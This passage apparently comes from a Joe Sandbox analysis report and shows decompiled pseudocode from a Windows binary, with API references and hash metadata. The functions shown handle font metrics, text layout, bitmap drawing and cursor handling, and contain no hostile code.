                  • Instruction Fuzzy Hash: 4311A271940B01AAD724EF76D802B5EBBF0EF09315F10952FE899973A1CB789A448F1D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0042D2AB(void* __ecx, struct tagSIZE* _a4, int* _a8, CHAR* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
                  				int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				CHAR* _v32;
                  				int _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				struct tagSIZE _v52;
                  				struct tagPOINT _v60;
                  				struct tagSIZE _v68;
                  				struct tagTEXTMETRICA _v124;
                  				struct tagTEXTMETRICA _v180;
                  				void* __edi;
                  				signed int _t126;
                  				signed int _t127;
                  				int _t128;
                  				signed int* _t130;
                  				signed int _t136;
                  				char _t137;
                  				int _t145;
                  				CHAR* _t147;
                  				int _t161;
                  				signed int _t165;
                  				int _t166;
                  				signed int _t170;
                  				signed short _t177;
                  				CHAR* _t183;
                  				struct tagSIZE* _t184;
                  				int* _t187;
                  				signed int _t189;
                  				void* _t191;
                  				int _t196;
                  				int _t203;
                  				signed int _t205;
                  				void* _t211;
                  				int* _t215;
                  
                  				_t211 = __ecx;
                  				GetTextMetricsA( *(__ecx + 8),  &_v124);
                  				GetTextMetricsA( *(__ecx + 4),  &_v180);
                  				GetTextExtentPoint32A( *(__ecx + 8), 0x454db8, 1, _a4);
                  				_t126 = GetTextAlign( *(__ecx + 8));
                  				_v44 = _t126;
                  				_t127 = _t126 & 0x00000001;
                  				_v40 = _t127;
                  				if(_t127 == 0) {
                  					_t187 = _a8;
                  				} else {
                  					GetCurrentPositionEx( *(__ecx + 4),  &_v60);
                  					_t187 = _a8;
                  					 *_t187 = _v60.x;
                  				}
                  				_t183 = _a12;
                  				_t128 =  *_t187;
                  				_v16 = _v16 & 0x00000000;
                  				_v24 = _v24 & 0x00000000;
                  				_t215 = _a40;
                  				_v32 = _t183;
                  				_v36 = _t128;
                  				_a12 = _t128;
                  				if(_a20 != 0) {
                  					if(_a24 != 1) {
                  						_t177 = GetTabbedTextExtentA( *(_t211 + 8), 0x454db4, 1, 0, 0);
                  						_t187 = _a8;
                  						_v24 = _t177 & 0x0000ffff;
                  						_t128 = _a12;
                  					} else {
                  						_v24 =  *_a28;
                  					}
                  				}
                  				_t203 = _a16;
                  				_v12 = _v12 & 0x00000000;
                  				if( *_t203 <= 0) {
                  					L37:
                  					_t184 = _a4;
                  					_t184->cx = _t128 -  *_t187;
                  					_t130 = _a44;
                  					 *_t130 =  *_t130 & 0x00000000;
                  					_t205 = _v44 & 0x00000006;
                  					if(_t205 != 0) {
                  						if(_t205 != 6) {
                  							if(_t205 == 2) {
                  								 *_t130 = _v16;
                  							}
                  							L44:
                  							if(_v40 != 0) {
                  								MoveToEx( *(_t211 + 4),  *_t187, _v60.y, 0);
                  							}
                  							 *_a16 = _t215 - _a40 >> 2;
                  							return _t184;
                  						}
                  						asm("cdq");
                  						_t136 = _v16 - _t205 >> 1;
                  						L41:
                  						 *_t187 =  *_t187 + _t136;
                  						goto L44;
                  					}
                  					_t136 = _v16;
                  					goto L41;
                  				} else {
                  					_v8 = 1;
                  					do {
                  						_t137 =  *_t183;
                  						_t189 = 0 | _t137 == _v124.tmBreakChar;
                  						_v28 = _t189;
                  						if(_t189 != 0 || _a20 != _t189 && _t137 == 9) {
                  							GetTextExtentPoint32A( *(_t211 + 8), _v32, _v28 - _v32 + _t183,  &_v68);
                  							_t145 = _v68.cx - _v124.tmOverhang + _v36;
                  							if(_v28 == 0) {
                  								_t145 = E0042CDE8(_t189, _t145, _a24, _a28, _a32, _v24);
                  							}
                  							_t191 = _t145 - _a12;
                  							if(_t215 != _a40) {
                  								 *((intOrPtr*)(_t215 - 4)) =  *((intOrPtr*)(_t215 - 4)) + _t191;
                  							} else {
                  								_v16 = _v16 + _t191;
                  							}
                  							_a12 = _t145;
                  							_v36 = _t145;
                  							_v32 =  &(_t183[1]);
                  						} else {
                  							if(E00434A02(_t137) == 0 || _v8 >=  *_a16) {
                  								GetCharWidthA( *(_t211 + 4),  *_t183 & 0x000000ff,  *_t183 & 0x000000ff,  &_v20);
                  								if(GetCharWidthA( *(_t211 + 8),  *_t183 & 0x000000ff,  *_t183 & 0x000000ff, _t215) != 0) {
                  									goto L23;
                  								}
                  								goto L21;
                  							} else {
                  								if(GetTextExtentPointA( *(_t211 + 4), _t183, 2,  &_v52) == 0) {
                  									_t170 = _v180.tmAveCharWidth;
                  								} else {
                  									asm("cdq");
                  									_t170 = _v52.cx - _t203 >> 1;
                  								}
                  								_v20 = _t170;
                  								if(GetTextExtentPointA( *(_t211 + 8), _t183, 2,  &_v52) == 0) {
                  									L21:
                  									_t166 = _v124.tmAveCharWidth;
                  									goto L22;
                  								} else {
                  									asm("cdq");
                  									_t166 = _v52.cx - _t203 >> 1;
                  									L22:
                  									 *_t215 = _t166;
                  									L23:
                  									 *_t215 =  *_t215 - _v124.tmOverhang;
                  									_t196 =  *_t215;
                  									_t203 = _v20 - _v180.tmOverhang;
                  									_a12 =  &(_a12[_t196]);
                  									_v20 = _t203;
                  									if(_t215 != _a40) {
                  										asm("cdq");
                  										_t165 = _t196 - _t203 - _t203 >> 1;
                  										 *((intOrPtr*)(_t215 - 4)) =  *((intOrPtr*)(_t215 - 4)) + _t165;
                  										 *_t215 = _t196 - _t165;
                  									}
                  									_a36 = _a36 + 1;
                  									 *_a36 =  *_t183;
                  									if(E00434A02( *_t183) != 0 && _v8 <  *_a16) {
                  										_a36 = _a36 + 1;
                  										 *_a36 = _t183[1];
                  										_t161 =  *_t215;
                  										_a12 =  &(_a12[_t161]);
                  										_t215 =  &(_t215[1]);
                  										_v12 = _v12 + 1;
                  										_v8 = _v8 + 1;
                  										 *_t215 = _t161;
                  									}
                  									_t215 =  &(_t215[1]);
                  									goto L35;
                  								}
                  							}
                  						}
                  						L35:
                  						_t147 = E004348EB(_t203, _t211, _t183);
                  						_v12 = _v12 + 1;
                  						_v8 = _v8 + 1;
                  						_t183 = _t147;
                  					} while (_v12 <  *_a16);
                  					_t187 = _a8;
                  					_t128 = _a12;
                  					goto L37;
                  				}
                  			}

                  APIs
                  • GetTextMetricsA.GDI32(?,?), ref: 0042D2C8
                  • GetTextMetricsA.GDI32(?,?), ref: 0042D2D4
                  • GetTextExtentPoint32A.GDI32(?,00454DB8,00000001,?), ref: 0042D2E3
                  • GetTextAlign.GDI32(?), ref: 0042D2EC
                  • GetCurrentPositionEx.GDI32(?,?), ref: 0042D304
                  • GetTabbedTextExtentA.USER32(?,00454DB4,00000001,00000000,00000000), ref: 0042D354
                  • GetTextExtentPointA.GDI32(00000001,?,00000002,?), ref: 0042D3C1
                  • GetTextExtentPointA.GDI32(00000000,?,00000002,?), ref: 0042D3E8
                  • GetCharWidthA.GDI32(00000001,00000000,00000000,?), ref: 0042D408
                  • GetCharWidthA.GDI32(00000000,00000000,00000000,?), ref: 0042D417
                  • GetTextExtentPoint32A.GDI32(00000000,?,?,?), ref: 0042D4A6
                  • __mbsinc.LIBCMT ref: 0042D4EC
                  • MoveToEx.GDI32(?,?,?,00000000), ref: 0042D555
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Text$Extent$CharMetricsPointPoint32Width$AlignCurrentMovePositionTabbed__mbsinc
                  • String ID:
                  • API String ID: 2771247214-0
                  • Opcode ID: 3ff7e1a845ed8d10c28fc4d3c49dc106eccc5b0a7c26ecc63004be9a7f000bf3
                  • Instruction ID: 80ba98c3184a9379cf6ff72923f26b37a2a1162b8237e024fa54389e1ba7250f
                  • Opcode Fuzzy Hash: 3ff7e1a845ed8d10c28fc4d3c49dc106eccc5b0a7c26ecc63004be9a7f000bf3
                  • Instruction Fuzzy Hash: 19B16575A0022AEFCF10CFA8E984AEEBBB5FF09314F54416AE815A7250C778AD51CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042D0D6(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                  				signed int _v8;
                  				struct tagLOGFONTA _v68;
                  				struct tagSIZE _v76;
                  				struct tagSIZE _v84;
                  				void* _v88;
                  				int _v92;
                  				int _v96;
                  				struct tagTEXTMETRICA _v152;
                  				void* __esi;
                  				signed int _t65;
                  				long _t73;
                  				void* _t82;
                  				signed int _t86;
                  				signed int _t87;
                  				void* _t112;
                  				int _t116;
                  				void* _t118;
                  				void* _t121;
                  				void** _t122;
                  				signed int _t124;
                  				signed int _t126;
                  
                  				_t113 = __edi;
                  				_t112 = __edx;
                  				_t104 = __ebx;
                  				_t124 = _t126;
                  				_t65 =  *0x463404; // 0x38a11573
                  				_t66 = _t65 ^ _t124;
                  				_v8 = _t65 ^ _t124;
                  				_t120 = __ecx;
                  				if( *(__ecx + 8) != 0) {
                  					_t66 =  *(__ecx + 0x2c);
                  					if(_t66 != 0) {
                  						if( *((intOrPtr*)(__ecx + 4)) != 0) {
                  							_push(__ebx);
                  							_push(__edi);
                  							GetObjectA(_t66, 0x3c,  &_v68);
                  							GetTextFaceA( *(__ecx + 8), 0x20,  &(_v68.lfFaceName));
                  							GetTextMetricsA( *(__ecx + 8),  &_v152);
                  							_t73 = _v152.tmHeight;
                  							if(_t73 >= 0) {
                  								_v68.lfHeight = _v152.tmInternalLeading - _t73;
                  							} else {
                  								_v68.lfHeight = _t73;
                  							}
                  							_v68.lfWidth = _v152.tmAveCharWidth;
                  							_v68.lfWeight = _v152.tmWeight;
                  							_v68.lfItalic = _v152.tmItalic;
                  							_v68.lfUnderline = _v152.tmUnderlined;
                  							_v68.lfStrikeOut = _v152.tmStruckOut;
                  							_v68.lfCharSet = _v152.tmCharSet;
                  							_v68.lfPitchAndFamily = _v152.tmPitchAndFamily;
                  							_t82 = CreateFontIndirectA( &_v68);
                  							_v88 = _t82;
                  							SelectObject( *(_t120 + 4), _t82);
                  							GetTextMetricsA( *(_t120 + 4),  &_v152);
                  							_t86 = _v152.tmHeight;
                  							_t116 =  ~(_v68.lfHeight);
                  							if(_t86 >= 0) {
                  								_t87 = _t86 - _v152.tmInternalLeading;
                  							} else {
                  								_t87 =  ~_t86;
                  							}
                  							_v92 = _t87;
                  							GetWindowExtEx( *(_t120 + 4),  &_v76);
                  							GetViewportExtEx( *(_t120 + 4),  &_v84);
                  							if(_v76.cy < 0) {
                  								_v76.cy =  ~(_v76.cy);
                  							}
                  							if(_v84.cy < 0) {
                  								_v84.cy =  ~(_v84.cy);
                  							}
                  							_v96 = MulDiv(_t116, _v84.cy, _v76.cy);
                  							if(_v96 >= MulDiv(_v92, _v84.cy, _v76.cy)) {
                  								_t118 = _v88;
                  							} else {
                  								_v68.lfPitchAndFamily = (_v68.lfPitchAndFamily & 0 | (_v68.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
                  								_v68.lfFaceName = 0;
                  								_t118 = CreateFontIndirectA( &_v68);
                  								SelectObject( *(_t120 + 4), _t118);
                  								DeleteObject(_v88);
                  							}
                  							_t122 = _t120 + 0x28;
                  							_t66 = E0041FCF2(_t122);
                  							 *_t122 = _t118;
                  							_pop(_t113);
                  							_pop(_t104);
                  						}
                  					} else {
                  						_push(0xe);
                  						_t66 =  *((intOrPtr*)( *__ecx + 0x24))();
                  					}
                  				}
                  				_pop(_t121);
                  				return E00430650(_t66, _t104, _v8 ^ _t124, _t112, _t113, _t121);
                  			}

                  APIs
                  • GetObjectA.GDI32(?,0000003C,?), ref: 0042D11E
                  • GetTextFaceA.GDI32(00000000,00000020,?), ref: 0042D12D
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D143
                  • CreateFontIndirectA.GDI32(?), ref: 0042D193
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D19C
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D1AC
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042D1D1
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042D1DE
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D203
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D211
                  • CreateFontIndirectA.GDI32(?), ref: 0042D231
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D239
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectText$CreateFontIndirectMetricsSelect$FaceViewportWindow
                  • String ID:
                  • API String ID: 4277312469-0
                  • Opcode ID: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction ID: 782ba5df95f801dfe7796d8664102e7f783a38d20a5401a22cb6488579e2bdbf
                  • Opcode Fuzzy Hash: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction Fuzzy Hash: 70513235A00268DFDF118FA5DD45AEEBBB9FF59300F10406AE859A6211D734AD46CF28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00423285(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t115;
                  				void* _t121;
                  				intOrPtr _t162;
                  				void* _t170;
                  				void* _t171;
                  
                  				_t171 = __eflags;
                  				_push(0x58);
                  				E00431A9B(E0044BFAF, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t170 - 0x3c)) = 0x45385c;
                  				 *(_t170 - 0x38) = 0;
                  				 *((intOrPtr*)(_t170 - 0x34)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x30)) = 0;
                  				 *(_t170 - 4) = 0;
                  				 *((intOrPtr*)(_t170 - 0x4c)) = 0x45385c;
                  				 *(_t170 - 0x48) = 0;
                  				 *((intOrPtr*)(_t170 - 0x44)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x40)) = 0;
                  				_t162 = 0x4502c8;
                  				 *((intOrPtr*)(_t170 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x1c)) = 0x4502c8;
                  				 *(_t170 - 4) = 2;
                  				_push(GetSysColor(0x14));
                  				E00423242(0, _t170 - 0x2c, 0x4502c8, GetSysColor, _t171);
                  				 *(_t170 - 4) = 3;
                  				_push(GetSysColor(0x10));
                  				E00423242(0, _t170 - 0x24, 0x4502c8, GetSysColor, _t171);
                  				 *(_t170 - 4) = 4;
                  				if(E0040876B(_t170 - 0x3c, 0) != 0 && E0040876B(_t170 - 0x4c, 0) != 0) {
                  					_t168 =  *((intOrPtr*)(_t170 + 8));
                  					GetObjectA( *( *((intOrPtr*)(_t170 + 8)) + 4), 0x18, _t170 - 0x64);
                  					E004230B1( *((intOrPtr*)(_t170 + 0xc)));
                  					if(E004230ED( *((intOrPtr*)(_t170 + 0xc)),  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x54) & 0x0000ffff,  *(_t170 - 0x52) & 0x0000ffff, 0) != 0 && E004230ED(_t170 - 0x1c,  *(_t170 - 0x60),  *(_t170 - 0x5c), 1, 1, 0) != 0) {
                  						 *((intOrPtr*)(_t170 + 8)) = E00408791(_t170 - 0x3c, _t168);
                  						_t115 = E00408791(_t170 - 0x4c, _t170 - 0x1c);
                  						 *((intOrPtr*)(_t170 - 0x14)) = _t115;
                  						if( *((intOrPtr*)(_t170 + 8)) != 0 && _t115 != 0) {
                  							 *((intOrPtr*)(_t170 - 0x10)) = E004224D1(GetPixel( *(_t170 - 0x38), 0, 0), _t170 - 0x3c, _t116);
                  							E004224D1(BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0xcc0020), _t170 - 0x3c, 0xffffff);
                  							BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0x1100a6);
                  							_t121 = E00408791(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc)));
                  							_t178 = _t121;
                  							if(_t121 != 0) {
                  								E004224D1(E00423FD4(_t170 - 0x3c, 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *((intOrPtr*)(_t170 + 0x10))), _t170 - 0x3c, 0xffffff);
                  								 *((intOrPtr*)(_t170 + 0xc)) = E00423194(_t170 - 0x3c, _t170 - 0x2c);
                  								BitBlt( *(_t170 - 0x38), 1, 1,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
                  								E00423194(_t170 - 0x3c, _t170 - 0x24);
                  								BitBlt( *(_t170 - 0x38), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
                  								E004224D1(E00423194(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc))), _t170 - 0x3c,  *((intOrPtr*)(_t170 - 0x10)));
                  							}
                  							E00408791(_t170 - 0x4c,  *((intOrPtr*)(_t170 - 0x14)));
                  							E00408791(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 8)));
                  							_t162 = 0x4502c8;
                  						}
                  					}
                  				}
                  				 *(_t170 - 4) = 3;
                  				 *((intOrPtr*)(_t170 - 0x24)) = 0x452f4c;
                  				E0040ADD4(0, _t170 - 0x24, _t162, 0x452f4c, _t178);
                  				 *(_t170 - 4) = 2;
                  				 *((intOrPtr*)(_t170 - 0x2c)) = 0x452f4c;
                  				E0040ADD4(0, _t170 - 0x2c, _t162, 0x452f4c, _t178);
                  				 *(_t170 - 4) = 1;
                  				 *((intOrPtr*)(_t170 - 0x1c)) = _t162;
                  				E0040ADD4(0, _t170 - 0x1c, _t162, 0x452f4c, _t178);
                  				 *(_t170 - 4) = 0;
                  				E00422E06(_t170 - 0x4c);
                  				 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
                  				return E00431B73(E00422E06(_t170 - 0x3c));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042328C
                  • GetSysColor.USER32(00000014), ref: 004232CA
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                  • GetSysColor.USER32(00000010), ref: 004232DB
                    • Part of subcall function 0040876B: CreateCompatibleDC.GDI32(?), ref: 0040877E
                  • GetObjectA.GDI32(00000004,00000018,?), ref: 00423318
                    • Part of subcall function 004230ED: CreateBitmap.GDI32(?,?,?,?,?), ref: 00423104
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00423393
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224EF
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224FC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004233C0
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 004233E5
                    • Part of subcall function 00423FD4: SetBkColor.GDI32(00000000,?), ref: 00423FE5
                    • Part of subcall function 00423FD4: ExtTextOutA.GDI32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00424017
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 00423439
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 00423458
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$CreateObject$H_prolog3Select$BitmapBrushCompatiblePixelSolidText
                  • String ID: L/E$\8E
                  • API String ID: 3190328746-603014896
                  • Opcode ID: 3ff2db5e1597f59de4d40c46edeb17716054e59519dfac510e37256ba6260ae5
                  • Instruction ID: 1e965cb3cce3642539156f5de479b909e84430b2223586cd9c3720f517206d08
                  • Opcode Fuzzy Hash: 3ff2db5e1597f59de4d40c46edeb17716054e59519dfac510e37256ba6260ae5
                  • Instruction Fuzzy Hash: 057122B1D0021DBEDF05EFE1EC819EEBB79AF08308F50802AB915761A1DB395E15DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00419B2A(intOrPtr* __ecx) {
                  				signed int _v8;
                  				signed int _v12;
                  				struct tagPOINT _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				struct tagRECT _v44;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t53;
                  				long _t58;
                  				intOrPtr _t59;
                  				intOrPtr _t61;
                  				void* _t63;
                  				signed short _t69;
                  				signed int _t79;
                  				signed int _t80;
                  				void* _t87;
                  				void* _t91;
                  				intOrPtr _t93;
                  				long _t94;
                  				signed short _t98;
                  				signed int _t108;
                  				signed short _t111;
                  				intOrPtr* _t112;
                  				intOrPtr* _t113;
                  
                  				_t113 = __ecx;
                  				GetCursorPos( &_v20);
                  				GetWindowRect( *(_t113 + 0x20),  &_v44);
                  				_t53 =  *((intOrPtr*)(_t113 + 0x70));
                  				_t111 = 0;
                  				if(_t53 == 0x7923 || _t53 == 0x7922) {
                  					_t93 = _v20.y;
                  					if(_t93 >= _v44.top) {
                  						__eflags = _t93 - _v44.bottom;
                  						if(_t93 > _v44.bottom) {
                  							_t111 = 0x791d;
                  						}
                  					} else {
                  						_t111 = 0x7917;
                  					}
                  				}
                  				if(_t53 == 0x7923 || _t53 == 0x7921) {
                  					_t94 = _v20.x;
                  					if(_t94 >= _v44.left) {
                  						__eflags = _t94 - _v44.right;
                  						if(_t94 > _v44.right) {
                  							__eflags = _t111;
                  							if(_t111 != 0) {
                  								__eflags = _t53 - 0x7923;
                  								if(_t53 == 0x7923) {
                  									_t111 = _t111 + 1;
                  									__eflags = _t111;
                  								}
                  							} else {
                  								_t111 = 0x791b;
                  							}
                  						}
                  					} else {
                  						if(_t111 != 0) {
                  							__eflags = _t53 - 0x7923;
                  							if(_t53 == 0x7923) {
                  								_t111 = _t111 - 1;
                  							}
                  						} else {
                  							_t111 = 0x7919;
                  						}
                  					}
                  				}
                  				if( *((intOrPtr*)(_t113 + 0x6c)) == 0) {
                  					__eflags = _t111;
                  					if(__eflags != 0) {
                  						SetCursor(LoadCursorA( *(E0041F363(0x7923, _t111, _t113, __eflags) + 0xc), _t111 & 0x0000ffff));
                  						_t58 = _v20.x;
                  						__eflags = _t58 - _v44.right;
                  						if(_t58 <= _v44.right) {
                  							__eflags = _t58 - _v44.left;
                  							if(_t58 >= _v44.left) {
                  								_t26 =  &_v12;
                  								 *_t26 = _v12 & 0x00000000;
                  								__eflags =  *_t26;
                  								L30:
                  								_t59 = _v20.y;
                  								__eflags = _t59 - _v44.bottom;
                  								if(_t59 <= _v44.bottom) {
                  									__eflags = _t59 - _v44.top;
                  									if(_t59 >= _v44.top) {
                  										_t34 =  &_v8;
                  										 *_t34 = _v8 & 0x00000000;
                  										__eflags =  *_t34;
                  										L36:
                  										_t112 = E00410293(_t113);
                  										_t61 =  *((intOrPtr*)(_t113 + 0x70));
                  										__eflags = _t61 - 0x7923;
                  										if(_t61 == 0x7923) {
                  											L39:
                  											_t98 = 1;
                  											__eflags = 1;
                  											L40:
                  											__eflags = _t61 - 0x7923;
                  											if(_t61 == 0x7923) {
                  												L43:
                  												_t63 = 1;
                  												__eflags = 1;
                  												L44:
                  												 *((intOrPtr*)( *_t112 + 0x18c))( &_v28, _v12, _v8, _t63, _t98);
                  												E00412C34(_t113, 0);
                  												_t69 = E0041E9BB("`&E", E0040EE3C(0, _t113, GetParent( *(_t112 + 0x20))));
                  												_push(1);
                  												_push(_v24);
                  												_push(_v28);
                  												__eflags = _t69;
                  												if(_t69 != 0) {
                  													 *((intOrPtr*)( *_t69 + 0x184))(_t112);
                  												} else {
                  													 *((intOrPtr*)( *_t112 + 0x144))();
                  												}
                  												UpdateWindow( *(_t113 + 0x20));
                  												__eflags =  *((intOrPtr*)(_t113 + 0x64)) - 0x10;
                  												return E00412D05(_t113, 0x466348,  *((intOrPtr*)(_t113 + 0x64)) - 0x10,  *((intOrPtr*)(_t113 + 0x68)) - 0x10, 0, 0, 0x51);
                  											}
                  											__eflags = _t61 - 0x7921;
                  											if(_t61 == 0x7921) {
                  												goto L43;
                  											}
                  											_t63 = 0;
                  											goto L44;
                  										}
                  										__eflags = _t61 - 0x7922;
                  										if(_t61 == 0x7922) {
                  											goto L39;
                  										}
                  										_t98 = 0;
                  										goto L40;
                  									}
                  									_t79 = _t59 - _v44.top;
                  									__eflags = _t79;
                  									L34:
                  									_v8 = _t79;
                  									goto L36;
                  								}
                  								_t79 = _t59 - _v44.bottom;
                  								goto L34;
                  							}
                  							_t80 = _t58 - _v44.left;
                  							__eflags = _t80;
                  							L28:
                  							_v12 = _t80;
                  							goto L30;
                  						}
                  						_t80 = _t58 - _v44.right;
                  						goto L28;
                  					}
                  					return SetCursor( *(_t113 + 0x74));
                  				}
                  				KillTimer( *(_t113 + 0x20), 0xe000);
                  				ReleaseCapture();
                  				SetCursor(0);
                  				_t91 = E00410293(_t113);
                  				_t87 =  *((intOrPtr*)( *_t113 + 0x60))();
                  				_t108 =  *(_t91 + 0x58);
                  				if(_t108 != 0) {
                  					_t87 =  *((intOrPtr*)( *_t108 + 4))(1);
                  				}
                  				 *(_t91 + 0x58) =  *(_t91 + 0x58) & 0x00000000;
                  				return _t87;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                  • String ID: `&E
                  • API String ID: 2135910768-1929257993
                  • Opcode ID: 1ee815c25b10352745542af0c80f1d5c47765e78def4f617f18e9468ae99dcfd
                  • Instruction ID: eb199d0561742021218959bc1adea6b17d397f6cb78be9abe42bb6aed1478ba6
                  • Opcode Fuzzy Hash: 1ee815c25b10352745542af0c80f1d5c47765e78def4f617f18e9468ae99dcfd
                  • Instruction Fuzzy Hash: E151CF31A04105EFDF24DBA5D9A8AFEB7F5FB44300F20046AE546D3291E738ADC18B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E004489F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t18;
                  				void* _t23;
                  				void* _t39;
                  				intOrPtr _t43;
                  				void* _t44;
                  
                  				_t39 = __edx;
                  				_t29 = __ebx;
                  				_push(0x14);
                  				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
                  				E00448F7B(_t44 - 0x14, 0);
                  				_t43 =  *0x46743c; // 0x24310d8
                  				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                  				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x467554));
                  				_t41 = _t18;
                  				if(_t18 == 0) {
                  					if(_t43 == 0) {
                  						_push( *((intOrPtr*)(_t44 + 8)));
                  						_push(_t44 - 0x10);
                  						_t23 = E004485F1(__ebx, _t41, _t43, __eflags);
                  						__eflags = _t23 - 0xffffffff;
                  						if(_t23 == 0xffffffff) {
                  							E00430C66(_t44 - 0x20, "bad cast");
                  							E00430CF4(_t44 - 0x20, 0x45e790);
                  						}
                  						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                  						 *0x46743c =  *((intOrPtr*)(_t44 - 0x10));
                  						E00447769( *((intOrPtr*)(_t44 - 0x10)));
                  						E0044911C(_t29, _t39, _t41, _t43, _t41);
